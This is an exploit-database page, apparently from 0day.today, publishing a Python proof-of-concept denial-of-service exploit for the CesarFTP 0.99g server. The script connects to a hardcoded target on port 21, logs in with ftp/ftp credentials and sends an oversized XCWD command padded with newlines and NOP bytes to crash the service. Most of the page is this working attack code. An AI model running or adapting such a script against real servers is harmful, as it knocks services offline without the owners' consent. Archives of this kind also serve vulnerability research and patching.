CesarFTP 0.99g - XCWD Denial of Service

2016-01-1900:00:00

Irving Aguilar

0day.today

EPSS

0.825

Percentile

98.4%

JSON

Exploit for windows platform in category dos / poc

#!/usr/bin/env python
#-*- coding:utf-8 -*-
# Exploit Title         : CesarFTP 0.99g -(XCWD)Remote BoF Exploit
# Discovery by              : Irving Aguilar
# Email         : [email protected]
# Discovery Date        : 18.01.2016
# Tested Version        : 0.99g
# Vulnerability Type  : Denial of Service (DoS)
# Tested on OS          : Windows XP Professional SP3 x86 es
 
import socket
 
 
buffer = 'XCWD ' + '\n' * 667 +'\x90' * 20
target = '192.168.1.73'
port = 21
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((target, port))
print '[*] Target: ' + target
print '[*] Port: ' + str(port)
s.recv(1024)
 
s.send('USER ftp\r\n')
s.recv(1024)
 
s.send('PASS ftp\r\n')
s.recv(1024)
 
s.send( buffer  + '\r\n')
print '[+] Buffer sent'
s.close()

#  0day.today [2018-01-05]  #

EPSS

0.825

Percentile

98.4%

JSON

Related for 1337DAY-ID-25770